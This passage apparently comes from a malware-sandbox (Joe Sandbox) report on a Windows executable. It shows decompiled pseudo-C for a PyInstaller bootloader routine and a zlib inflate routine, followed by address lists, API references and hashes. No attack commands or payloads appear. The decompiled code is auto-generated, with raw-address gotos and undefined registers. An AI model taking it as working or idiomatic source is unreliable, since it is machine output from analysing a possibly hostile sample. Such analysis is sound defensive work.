				if (_t122 == 0) goto 0x35c463fd;
				r8d = 0;
				E00007FF77FF735C47250(_t73, _t73, _t119, _t122, _t122, _t130);
				E00007FF77FF735C55CF0(0, _t73, _t73, _t73);
				E00007FF77FF735C5377C(0, _t73, _t73, _t130);
				E00007FF77FF735C5377C(0, _t73, _t73, _t130);
				goto 0x35c4640e;
				SetEnvironmentVariableW(??, ??);
				E00007FF77FF735C5377C(0, _t73, _t73, _t130);
				return E00007FF77FF735C4A410(1, 0, _a8248 ^ _t127);
			}


















                                                                                                                                                                                                                              0x7ff735c46230
                                                                                                                                                                                                                              0x7ff735c46230
                                                                                                                                                                                                                              0x7ff735c46230
                                                                                                                                                                                                                              0x7ff735c46230
                                                                                                                                                                                                                              0x7ff735c46235
                                                                                                                                                                                                                              0x7ff735c46243
                                                                                                                                                                                                                              0x7ff735c46248
                                                                                                                                                                                                                              0x7ff735c4624b
                                                                                                                                                                                                                              0x7ff735c46252
                                                                                                                                                                                                                              0x7ff735c46255
                                                                                                                                                                                                                              0x7ff735c4625d
                                                                                                                                                                                                                              0x7ff735c46260
                                                                                                                                                                                                                              0x7ff735c46266
                                                                                                                                                                                                                              0x7ff735c4626f
                                                                                                                                                                                                                              0x7ff735c4627a
                                                                                                                                                                                                                              0x7ff735c46285
                                                                                                                                                                                                                              0x7ff735c46295
                                                                                                                                                                                                                              0x7ff735c4629f
                                                                                                                                                                                                                              0x7ff735c462a6
                                                                                                                                                                                                                              0x7ff735c462af
                                                                                                                                                                                                                              0x7ff735c462b6
                                                                                                                                                                                                                              0x7ff735c462bb
                                                                                                                                                                                                                              0x7ff735c462ca
                                                                                                                                                                                                                              0x7ff735c462d0
                                                                                                                                                                                                                              0x7ff735c462d5
                                                                                                                                                                                                                              0x7ff735c462d8
                                                                                                                                                                                                                              0x7ff735c462e9
                                                                                                                                                                                                                              0x7ff735c462fa
                                                                                                                                                                                                                              0x7ff735c46305
                                                                                                                                                                                                                              0x7ff735c4630c
                                                                                                                                                                                                                              0x7ff735c46315
                                                                                                                                                                                                                              0x7ff735c4631f
                                                                                                                                                                                                                              0x7ff735c46324
                                                                                                                                                                                                                              0x7ff735c46326
                                                                                                                                                                                                                              0x7ff735c46332
                                                                                                                                                                                                                              0x7ff735c4633a
                                                                                                                                                                                                                              0x7ff735c4633c
                                                                                                                                                                                                                              0x7ff735c46344
                                                                                                                                                                                                                              0x7ff735c46347
                                                                                                                                                                                                                              0x7ff735c46355
                                                                                                                                                                                                                              0x7ff735c4635d
                                                                                                                                                                                                                              0x7ff735c46365
                                                                                                                                                                                                                              0x7ff735c4636d
                                                                                                                                                                                                                              0x7ff735c46374
                                                                                                                                                                                                                              0x7ff735c46381
                                                                                                                                                                                                                              0x7ff735c4638a
                                                                                                                                                                                                                              0x7ff735c46391
                                                                                                                                                                                                                              0x7ff735c46396
                                                                                                                                                                                                                              0x7ff735c463a2
                                                                                                                                                                                                                              0x7ff735c463aa
                                                                                                                                                                                                                              0x7ff735c463b2
                                                                                                                                                                                                                              0x7ff735c463b4
                                                                                                                                                                                                                              0x7ff735c463c0
                                                                                                                                                                                                                              0x7ff735c463c8
                                                                                                                                                                                                                              0x7ff735c463ca
                                                                                                                                                                                                                              0x7ff735c463d5
                                                                                                                                                                                                                              0x7ff735c463e3
                                                                                                                                                                                                                              0x7ff735c463eb
                                                                                                                                                                                                                              0x7ff735c463f3
                                                                                                                                                                                                                              0x7ff735c463fb
                                                                                                                                                                                                                              0x7ff735c46405
                                                                                                                                                                                                                              0x7ff735c4640e
                                                                                                                                                                                                                              0x7ff735c4643f

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000000,00000000,?,00007FF735C461FD), ref: 00007FF735C462CA
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C46440: GetEnvironmentVariableW.KERNEL32(00007FF735C4361E), ref: 00007FF735C4647A
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C46440: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF735C46497
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C55CF0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF735C55D09
                                                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF735C46381
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C42820: MessageBoxW.USER32 ref: 00007FF735C428F1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                                                                              • API String ID: 3752271684-1116378104
                                                                                                                                                                                                                              • Opcode ID: f42a34ffaf78b62d3c08ab016cd1463aa32d28643566d349cfbc9af56685243b
                                                                                                                                                                                                                              • Instruction ID: d22fec5d6ea0f588a48e66b7cae4aba756a5e72dd80df0ef648922dc2986f512
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f42a34ffaf78b62d3c08ab016cd1463aa32d28643566d349cfbc9af56685243b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01510493F0966361FA65BB7299156B9D2929F48FC8FC41430EC0E4779BDD2CE101A360
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C48098 Relevance: 12.0, Strings: 9, Instructions: 730COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                                                                                              			E00007FF77FF735C48098(signed int __ebx, void* __edi, void* __ebp, signed int __rax, signed char* __rsi, signed long long __r8, void* __r11, signed long long __r12, void* __r13) {
				signed int _t302;
				signed int _t305;
				unsigned int _t307;
				unsigned int _t311;
				signed int _t327;
				signed int _t329;
				signed int _t336;
				signed char _t341;
				signed int _t354;
				signed char _t359;
				unsigned int _t366;
				void* _t367;
				signed int _t376;
				signed int _t390;
				void* _t398;
				signed int _t399;
				void* _t400;
				signed int _t401;
				void* _t402;
				signed int _t403;
				void* _t404;
				signed int _t406;
				signed int _t407;
				void* _t408;
				signed int _t410;
				signed int _t411;
				void* _t412;
				signed int _t414;
				void* _t415;
				signed int _t416;
				signed int _t417;
				void* _t418;
				signed int _t420;
				void* _t421;
				signed int _t422;
				signed int _t424;
				signed int _t425;
				signed int _t430;
				signed char _t447;
				signed char _t451;
				signed char _t481;
				signed char _t484;
				signed char _t490;
				signed char _t514;
				signed char _t517;
				signed char _t523;
				void* _t525;
				intOrPtr _t526;
				void* _t530;
				signed int _t541;
				signed int _t548;
				signed char _t553;
				void* _t555;
				void* _t559;
				void* _t563;
				signed char _t575;
				signed char _t580;
				intOrPtr _t582;
				void* _t584;
				void* _t585;
				void* _t586;
				void* _t587;
				void* _t588;
				intOrPtr _t589;
				intOrPtr _t590;
				void* _t591;
				void* _t592;
				void* _t593;
				void* _t594;
				void* _t595;
				void* _t596;
				void* _t597;
				void* _t599;
				signed int _t601;
				signed int _t602;
				unsigned int _t603;
				unsigned int _t605;
				unsigned int _t610;
				unsigned int _t613;
				unsigned int _t616;
				signed int _t619;
				unsigned int _t620;
				unsigned int _t623;
				signed int _t625;
				unsigned int _t626;
				signed int _t629;
				unsigned int _t630;
				signed int _t632;
				unsigned int _t633;
				void* _t652;
				void* _t664;
				long long _t738;
				signed long long _t741;
				signed long long _t742;
				long long _t745;
				signed long long _t749;
				signed long long _t751;
				signed long long _t754;
				signed long long _t758;
				signed long long _t759;
				signed long long _t760;
				signed long long _t762;
				signed long long _t763;
				signed long long _t764;
				signed char* _t779;
				signed char* _t780;
				signed char* _t781;
				signed char* _t782;
				signed char* _t783;
				signed char* _t785;
				signed char* _t786;
				signed char* _t787;
				signed char* _t788;
				signed char* _t789;
				signed char* _t790;
				signed char* _t791;
				signed char* _t792;
				void* _t795;
				void* _t797;
				signed long long _t799;
				char* _t804;
				char* _t805;
				long long _t806;
				intOrPtr _t807;
				intOrPtr _t808;
				intOrPtr _t809;
				void* _t810;
				signed long long _t811;
				long long _t816;

				_t811 = __r12;
				_t810 = __r11;
				_t799 = __r8;
				if (__ebx - 0xe >= 0) goto 0x35c480be;
				if (__edi == 0) goto 0x35c47eff;
				_t584 = __edi - 1;
				_t601 = __ebp + (( *__rsi & 0x000000ff) << __ebx);
				_t779 =  &(__rsi[1]);
				_t398 = __ebx + 8;
				if (_t398 - 0xe < 0) goto 0x35c480a0;
				_t399 = _t398 + 0xfffffff2;
				_t602 = _t601 >> 5;
				_t430 = (_t601 & 0x0000001f) + 0x101;
				_t603 = _t602 >> 5;
				 *(__r13 + 0x7c) = _t430;
				_t548 = (_t602 & 0x0000001f) + 1;
				 *(__r13 + 0x80) = _t548;
				 *((intOrPtr*)(__r13 + 0x78)) = (_t603 & 0x0000000f) + 4;
				if (_t430 - 0x11e > 0) goto 0x35c48220;
				if (_t548 - 0x1e > 0) goto 0x35c48220;
				 *(__r13 + 0x84) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f45;
				if ( *(__r13 + 0x84) -  *((intOrPtr*)(__r13 + 0x78)) >= 0) goto 0x35c48188;
				if (_t399 - 3 >= 0) goto 0x35c4814e;
				if (_t584 == 0) goto 0x35c47eff;
				_t585 = _t584 - 1;
				_t605 = (_t603 >> 4) + (( *_t779 & 0x000000ff) << _t399);
				_t780 =  &(_t779[1]);
				_t400 = _t399 + 8;
				if (_t400 - 3 < 0) goto 0x35c48130;
				_t401 = _t400 + 0xfffffffd;
				 *(__r13 + 0x90 + __rax * 2) = _t605 & 7;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				_t302 =  *(__r13 + 0x84);
				if (_t302 -  *((intOrPtr*)(__r13 + 0x78)) < 0) goto 0x35c48124;
				if (_t302 - 0x13 >= 0) goto 0x35c481ba;
				 *(__r13 + 0x90 + __rax * 2) = r15w;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				if ( *(__r13 + 0x84) - 0x13 < 0) goto 0x35c48190;
				_t758 = __r13 + 0x70;
				_t738 = __r13 + 0x550;
				 *_t758 = 7;
				 *((long long*)(__r13 + 0x60)) = _t738;
				 *((long long*)(__r13 + 0x88)) = _t738;
				 *((long long*)(_t797 + 0x28)) = __r13 + 0x310;
				 *(_t797 + 0x20) = _t758;
				_t37 = _t758 + 0x13; // 0x13
				r8d = _t37;
				_t305 = E00007FF77FF735C49860(0, __r13 + 0x90, _t795, __r13 + 0x88, __r12);
				 *(_t797 + 0xb0) = _t305;
				if (_t305 == 0) goto 0x35c48239;
				 *(_t811 + 0x20) = "invalid code lengths set";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d54;
				_t741 = "too many length or distance symbols";
				 *(_t811 + 0x20) = _t741;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d61;
				 *(__r13 + 0x84) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f46;
				r10d =  *(__r13 + 0x7c);
				if ( *(__r13 + 0x84) -  *(__r13 + 0x80) + r10d >= 0) goto 0x35c48462;
				r9d = 1;
				_t807 =  *((intOrPtr*)(__r13 + 0x60));
				r9d = r9d <<  *(__r13 + 0x70);
				r9d = r9d - 1;
				_t759 = _t758 & _t741;
				_t307 =  *(_t807 + _t759 * 4);
				r8d = _t307;
				r8d = r8d >> 0x10;
				 *(_t797 + 0x34) = _t307;
				if ((_t307 >> 0x00000008 & 0x000000ff) - _t401 <= 0) goto 0x35c482e3;
				if (_t585 == 0) goto 0x35c47eff;
				_t586 = _t585 - 1;
				_t781 =  &(_t780[1]);
				_t402 = _t401 + 8;
				_t742 = _t741 & _t759;
				_t311 =  *(_t807 + _t742 * 4);
				_t553 = _t311 >> 8;
				r8d = _t311;
				r8d = r8d >> 0x10;
				 *(_t797 + 0x34) = _t311;
				if ((_t553 & 0x000000ff) - _t402 > 0) goto 0x35c482a7;
				_t652 = r8w - 0x10;
				if (_t652 >= 0) goto 0x35c4831a;
				_t403 = _t402 - (_t553 & 0x000000ff);
				 *((short*)(__r13 + 0x90 + _t759 * 2)) = _t311 >> 0x10;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				r8d =  *(__r13 + 0x84);
				goto 0x35c48447;
				if (_t652 != 0) goto 0x35c48379;
				_t555 = (_t553 & 0x000000ff) + 2;
				if (_t403 - _t555 >= 0) goto 0x35c48343;
				if (_t586 == 0) goto 0x35c47eff;
				_t587 = _t586 - 1;
				_t782 =  &(_t781[1]);
				_t404 = _t403 + 8;
				if (_t404 - _t555 < 0) goto 0x35c48326;
				_t447 =  *(_t797 + 0x35) & 0x000000ff;
				_t610 = ((_t605 >> 3) + (( *_t780 & 0x000000ff) << _t401) >> (_t553 & 0x000000ff)) + (( *_t781 & 0x000000ff) << _t403) >> _t447;
				if ( *(__r13 + 0x84) == 0) goto 0x35c48492;
				_t406 = _t404 - _t447 + 0xfffffffe;
				r9d =  *(__r13 + 0x90 + _t742 * 2) & 0x0000ffff;
				goto 0x35c48403;
				if (r8w != 0x11) goto 0x35c483c0;
				_t559 = (_t610 & 0x00000003) + 6;
				if (_t406 - _t559 >= 0) goto 0x35c483a4;
				if (_t587 == 0) goto 0x35c47eff;
				_t588 = _t587 - 1;
				_t783 =  &(_t782[1]);
				_t407 = _t406 + 8;
				if (_t407 - _t559 < 0) goto 0x35c48387;
				_t613 = (_t610 >> 2) + (( *_t782 & 0x000000ff) << _t406) >> ( *(_t797 + 0x35) & 0x000000ff);
				r9d = r15d;
				goto 0x35c483ff;
				_t563 = (_t613 & 0x00000007) + 0xa;
				if (_t407 - _t563 >= 0) goto 0x35c483e4;
				if (_t588 == 0) goto 0x35c47eff;
				_t589 = _t588 - 1;
				_t408 = _t407 + 8;
				if (_t408 - _t563 < 0) goto 0x35c483c7;
				_t451 =  *(_t797 + 0x35) & 0x000000ff;
				_t616 = (_t613 >> 3) + (( *_t783 & 0x000000ff) << _t407) >> _t451;
				r9d = r15w & 0xffffffff;
				_t664 =  *(__r13 + 0x84) + (_t616 & 0x0000007f) + 0xb -  *(__r13 + 0x80) +  *(__r13 + 0x7c);
				if (_t664 > 0) goto 0x35c48492;
				 *(__r13 + 0x90 + _t742 * 2) = r9w;
				r8d =  *(__r13 + 0x84);
				r8d = __r8 + 1;
				 *(__r13 + 0x84) = r8d;
				if (_t664 != 0) goto 0x35c48420;
				r10d =  *(__r13 + 0x7c);
				if (r8d -  *(__r13 + 0x80) + r10d < 0) goto 0x35c48270;
				if ( *((intOrPtr*)(__r13 + 8)) == 0x3f51) goto 0x35c47d54;
				if ( *((short*)(__r13 + 0x290)) != 0) goto 0x35c484ab;
				 *(_t811 + 0x20) = "invalid code -- missing end-of-block";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d54;
				 *(_t811 + 0x20) = "invalid bit length repeat";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d54;
				_t745 = __r13 + 0x550;
				 *(__r13 + 0x70) = 9;
				 *((long long*)(__r13 + 0x88)) = _t745;
				_t816 = __r13 + 0x310;
				 *((long long*)(__r13 + 0x60)) = _t745;
				 *((long long*)(_t797 + 0x28)) = _t816;
				 *(_t797 + 0x20) = __r13 + 0x70;
				r8d = r10d;
				_t327 = E00007FF77FF735C49860(1, __r13 + 0x90, _t795, __r13 + 0x88, _t811);
				 *(_t797 + 0xb0) = _t327;
				if (_t327 == 0) goto 0x35c48519;
				 *(_t811 + 0x20) = "invalid literal/lengths set";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d54;
				_t748 =  *((intOrPtr*)(__r13 + 0x88));
				_t760 = __r13 + 0x74;
				r8d =  *(__r13 + 0x80);
				 *((long long*)(__r13 + 0x68)) =  *((intOrPtr*)(__r13 + 0x88));
				 *_t760 = 6;
				 *((long long*)(_t797 + 0x28)) = _t816;
				 *(_t797 + 0x20) = _t760;
				_t329 = E00007FF77FF735C49860(2, 0x90 + _t748 * 2 + __r13, _t795, __r13 + 0x88, _t811);
				 *(_t797 + 0xb0) = _t329;
				r15d = _t329;
				if (_t329 == 0) goto 0x35c48586;
				_t749 = "invalid distances set";
				 *(_t811 + 0x20) = _t749;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d54;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f47;
				if ( *((intOrPtr*)(_t797 + 0xa8)) == 6) goto 0x35c48c84;
				r8d =  *(_t797 + 0xa0);
				r15d = 0;
				r10d =  *(_t797 + 0xb8);
				 *((intOrPtr*)(__r13 + 8)) = 0x3f48;
				if (_t589 - 6 < 0) goto 0x35c48638;
				if (r10d - 0x102 < 0) goto 0x35c48638;
				 *((long long*)(_t811 + 0x10)) =  *((intOrPtr*)(_t797 + 0x40));
				_t762 = _t811;
				 *(_t811 + 0x18) = r10d;
				 *_t811 =  &(_t783[1]);
				 *((intOrPtr*)(_t811 + 8)) = _t589;
				 *(__r13 + 0x48) = _t616 >> 7;
				 *(__r13 + 0x4c) = _t408 + 0xfffffff9 - _t451;
				E00007FF77FF735C49E20(r8d, _t599, _t749, _t762, _t807, _t810);
				r10d =  *(_t811 + 0x18);
				_t785 =  *_t811;
				_t590 =  *((intOrPtr*)(_t811 + 8));
				_t410 =  *(__r13 + 0x4c);
				 *((long long*)(_t797 + 0x40)) =  *((intOrPtr*)(_t811 + 0x10));
				 *(_t797 + 0xb8) = r10d;
				if ( *((intOrPtr*)(__r13 + 8)) != 0x3f3f) goto 0x35c47d61;
				 *(__r13 + 0x1be4) = 0xffffffff;
				goto 0x35c47d61;
				_t808 =  *((intOrPtr*)(__r13 + 0x60));
				_t763 = _t762 & _t749;
				 *(__r13 + 0x1be4) = r15d;
				if (( *(_t808 + _t763 * 4) >> 0x00000008 & 0x000000ff) - _t410 <= 0) goto 0x35c48697;
				if (_t590 == 0) goto 0x35c47eff;
				_t591 = _t590 - 1;
				_t619 =  *(__r13 + 0x48) + (( *_t785 & 0x000000ff) << _t410);
				_t786 =  &(_t785[1]);
				_t411 = _t410 + 8;
				_t336 =  *(_t808 + (_t749 & _t763) * 4);
				if ((_t336 >> 0x00000008 & 0x000000ff) - _t411 > 0) goto 0x35c48667;
				if (_t336 == 0) goto 0x35c48753;
				if ((_t336 & 0x000000f0) != 0) goto 0x35c48753;
				 *(_t797 + 0x34) = _t336;
				r14d =  *(_t797 + 0x35) & 0x000000ff;
				r8d = 1;
				r9d = _t336 >> 0x00000008 & 0x000000ff;
				r8d = r8d << (_t336 & 0x000000ff) + r9d;
				r8d = r8d - 1;
				r8d = r8d & _t619;
				r8d = r8d >> r9d;
				r8d = r8d + (_t336 >> 0x10);
				r8d =  *(_t808 + _t799 * 4) >> 0x00000008 & 0x000000ff;
				r8d = r8d + r9d;
				if (r8d - _t411 <= 0) goto 0x35c48744;
				r11d =  *(_t797 + 0x36) & 0x0000ffff;
				if (_t591 == 0) goto 0x35c47eff;
				r8d = 1;
				_t620 = _t619 + (( *_t786 & 0x000000ff) << _t411);
				_t592 = _t591 - 1;
				r8d = r8d << (_t336 & 0x000000ff) + r14d;
				_t787 =  &(_t786[1]);
				r8d = r8d - 1;
				r8d = r8d & _t620;
				_t412 = _t411 + 8;
				r8d = r8d >> r14d;
				r8d = r8d + r11d;
				_t341 =  *(_t808 + _t799 * 4);
				r8d = _t341 >> 0x00000008 & 0x000000ff;
				r8d = r8d + r14d;
				if (r8d - _t412 > 0) goto 0x35c486f8;
				_t481 = r14d;
				 *(__r13 + 0x1be4) = _t481;
				_t484 = _t341 >> 0x00000008 & 0x000000ff;
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t484;
				_t414 = _t412 - r14d - _t484;
				 *(__r13 + 0x50) = _t341 >> 0x10;
				if (_t341 != 0) goto 0x35c48780;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4d;
				goto 0x35c47d54;
				if ((_t341 & 0x00000020) == 0) goto 0x35c48794;
				 *(__r13 + 0x1be4) = 0xffffffff;
				goto 0x35c47d4c;
				if ((_t341 & 0x00000040) == 0) goto 0x35c487b1;
				_t751 = "invalid literal/length code";
				 *(_t811 + 0x20) = _t751;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d54;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f49;
				 *(__r13 + 0x58) = _t341 & 0xf;
				_t575 =  *(__r13 + 0x58);
				if (_t575 == 0) goto 0x35c48809;
				if (_t414 - _t575 >= 0) goto 0x35c487ed;
				if (_t592 == 0) goto 0x35c47eff;
				_t593 = _t592 - 1;
				_t623 = (_t620 >> _t481 >> _t484) + (( *_t787 & 0x000000ff) << _t414);
				_t788 =  &(_t787[1]);
				_t415 = _t414 + 8;
				if (_t415 - _t575 < 0) goto 0x35c487d0;
				_t490 = _t575;
				_t416 = _t415 - _t575;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) + ((0x00000001 << _t490) - 0x00000001 & _t623);
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t575;
				 *(__r13 + 0x1be8) =  *(__r13 + 0x50);
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4a;
				_t809 =  *((intOrPtr*)(__r13 + 0x68));
				_t764 = _t763 & _t751;
				if (( *(_t809 + _t764 * 4) >> 0x00000008 & 0x000000ff) - _t416 <= 0) goto 0x35c48874;
				if (_t593 == 0) goto 0x35c47eff;
				_t594 = _t593 - 1;
				_t625 = (_t623 >> _t490) + (( *_t788 & 0x000000ff) << _t416);
				_t789 =  &(_t788[1]);
				_t417 = _t416 + 8;
				_t354 =  *(_t809 + (_t751 & _t764) * 4);
				if ((_t354 >> 0x00000008 & 0x000000ff) - _t417 > 0) goto 0x35c48844;
				if ((_t354 & 0x000000f0) != 0) goto 0x35c4892b;
				 *(_t797 + 0x34) = _t354;
				r14d =  *(_t797 + 0x35) & 0x000000ff;
				r8d = 1;
				r9d = _t354 >> 0x00000008 & 0x000000ff;
				r8d = r8d << (_t354 & 0x000000ff) + r9d;
				r8d = r8d - 1;
				r8d = r8d & _t625;
				r8d = r8d >> r9d;
				r8d = r8d + (_t354 >> 0x10);
				r8d =  *(_t809 + _t799 * 4) >> 0x00000008 & 0x000000ff;
				r8d = r8d + r9d;
				if (r8d - _t417 <= 0) goto 0x35c4891c;
				r11d =  *(_t797 + 0x36) & 0x0000ffff;
				if (_t594 == 0) goto 0x35c47eff;
				r8d = 1;
				_t626 = _t625 + (( *_t789 & 0x000000ff) << _t417);
				_t595 = _t594 - 1;
				r8d = r8d << (_t354 & 0x000000ff) + r14d;
				_t790 =  &(_t789[1]);
				r8d = r8d - 1;
				r8d = r8d & _t626;
				_t418 = _t417 + 8;
				r8d = r8d >> r14d;
				r8d = r8d + r11d;
				_t359 =  *(_t809 + _t799 * 4);
				r8d = _t359 >> 0x00000008 & 0x000000ff;
				r8d = r8d + r14d;
				if (r8d - _t418 > 0) goto 0x35c488d0;
				_t514 = r14d;
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t514;
				r10d =  *(_t797 + 0xb8);
				_t517 = _t359 >> 0x00000008 & 0x000000ff;
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t517;
				_t420 = _t418 - r14d - _t517;
				if ((_t359 & 0x00000040) == 0) goto 0x35c48963;
				 *(_t811 + 0x20) = "invalid distance code";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d5c;
				r8d =  *(_t797 + 0xa0);
				 *(__r13 + 0x54) = _t359 >> 0x10;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4b;
				 *(__r13 + 0x58) = _t359 & 0xf;
				_t580 =  *(__r13 + 0x58);
				if (_t580 == 0) goto 0x35c489cb;
				if (_t420 - _t580 >= 0) goto 0x35c489af;
				if (_t595 == 0) goto 0x35c47eff;
				_t596 = _t595 - 1;
				_t629 = (_t626 >> _t514 >> _t517) + (( *_t790 & 0x000000ff) << _t420);
				_t791 =  &(_t790[1]);
				_t421 = _t420 + 8;
				if (_t421 - _t580 < 0) goto 0x35c48992;
				_t523 = _t580;
				_t422 = _t421 - _t580;
				_t630 = _t629 >> _t523;
				 *(__r13 + 0x54) =  *(__r13 + 0x54) + ((0x00000001 << _t523) - 0x00000001 & _t629);
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t580;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4c;
				if (r10d == 0) goto 0x35c47eff;
				_t366 =  *(__r13 + 0x54);
				_t525 = r8d - r10d;
				if (_t366 - _t525 <= 0) goto 0x35c48a3b;
				_t367 = _t366 - _t525;
				if (_t367 -  *((intOrPtr*)(__r13 + 0x38)) <= 0) goto 0x35c48a15;
				if ( *((intOrPtr*)(__r13 + 0x1be0)) == 0) goto 0x35c48a15;
				_t754 = "invalid distance too far back";
				 *(_t811 + 0x20) = _t754;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d5c;
				_t526 =  *((intOrPtr*)(__r13 + 0x3c));
				if (_t367 - _t526 <= 0) goto 0x35c48a23;
				r8d =  *(__r13 + 0x50);
				r9d = r8d;
				r9d =  <=  ? _t367 - _t526 : r9d;
				goto 0x35c48a4a;
				r8d =  *(__r13 + 0x50);
				r9d = r8d;
				_t530 =  <=  ? r9d : r10d;
				_t804 =  *((intOrPtr*)(_t797 + 0x40));
				r10d = r10d - _t530;
				r8d = r8d - _t530;
				 *(_t797 + 0xb8) = r10d;
				 *(__r13 + 0x50) = r8d;
				 *_t804 =  *( *((intOrPtr*)(_t797 + 0x40)) - _t754 - _t804 + _t804) & 0x000000ff;
				_t805 = _t804 + 1;
				if (r9d != r10d) goto 0x35c48a70;
				 *((long long*)(_t797 + 0x40)) = _t805;
				if ( *(__r13 + 0x50) != _t530 + 0xffffffff) goto 0x35c47d61;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f48;
				if (r10d == 0) goto 0x35c47eff;
				 *_t805 =  *(__r13 + 0x50) & 0x000000ff;
				_t806 = _t805 + 1;
				r10d = r10d - 1;
				 *((long long*)(_t797 + 0x40)) = _t806;
				 *(_t797 + 0xb8) = r10d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f48;
				goto 0x35c47d61;
				if ( *((intOrPtr*)(_t795 + 0x10)) == 0) goto 0x35c48bb6;
				if (_t422 - 0x20 >= 0) goto 0x35c48afe;
				if (_t596 == 0) goto 0x35c47eff;
				_t597 = _t596 - 1;
				_t631 = _t630 + (( *_t791 & 0x000000ff) << _t422);
				_t792 =  &(_t791[1]);
				if (_t422 + 8 - 0x20 < 0) goto 0x35c48ae0;
				r8d = r8d - r10d;
				 *((intOrPtr*)(_t811 + 0x1c)) =  *((intOrPtr*)(_t811 + 0x1c)) + r8d;
				 *((intOrPtr*)(__r13 + 0x24)) =  *((intOrPtr*)(__r13 + 0x24)) + r8d;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c48b4c;
				if (r8d == 0) goto 0x35c48b4c;
				if ( *((intOrPtr*)(__r13 + 0x18)) == 0) goto 0x35c48b32;
				E00007FF77FF735C49520(_t806 - _t754);
				goto 0x35c48b37;
				_t376 = E00007FF77FF735C49230( *(__r13 + 0x20), _t754, _t806 - _t754, _t799, _t806);
				r10d =  *(_t797 + 0xb8);
				 *(__r13 + 0x20) = _t376;
				 *(_t811 + 0x4c) = _t376;
				 *(_t797 + 0xa0) = r10d;
				r14d = r10d;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c48ba6;
				if ( *((intOrPtr*)(__r13 + 0x18)) != 0) goto 0x35c48b87;
				if (((_t630 + (( *_t791 & 0x000000ff) << _t422) & 0x0000ff00) + (_t630 + (( *_t791 & 0x000000ff) << _t422) << 0x10) << 8) + (_t631 >> 0x00000008 & 0x0000ff00) + (_t631 >> 0x18) ==  *(__r13 + 0x20)) goto 0x35c48ba6;
				 *(_t811 + 0x20) = "incorrect data check";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d5c;
				_t632 = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4f;
				_t424 = r15d;
				goto 0x35c48bd0;
				r14d =  *(_t797 + 0xa0);
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4f;
				r14d =  *(_t797 + 0xa0);
				if ( *(__r13 + 0x10) == 0) goto 0x35c48c4b;
